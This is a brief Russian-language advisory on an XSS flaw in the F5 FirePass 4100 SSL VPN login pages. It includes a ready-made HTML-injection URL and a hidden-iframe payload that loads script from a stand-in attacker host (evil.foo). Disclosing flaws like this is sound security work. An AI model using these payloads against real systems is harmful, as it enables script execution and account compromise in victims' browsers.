Хакер #305. Многошаговые SQL-инъекции
Программа: F5 FirePass 4100
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в F5 FirePass 4100 SSL VPN сценариями my.logon.php3 и my.activation.php3. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
1) https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--
The payload in the example is
"></script><textarea>HTML_injection_test</textarea><!—
2) <html>
<iframe src="https://target.tld/my.logon.php3?%22%3E%3C/ script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body. appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>
</html>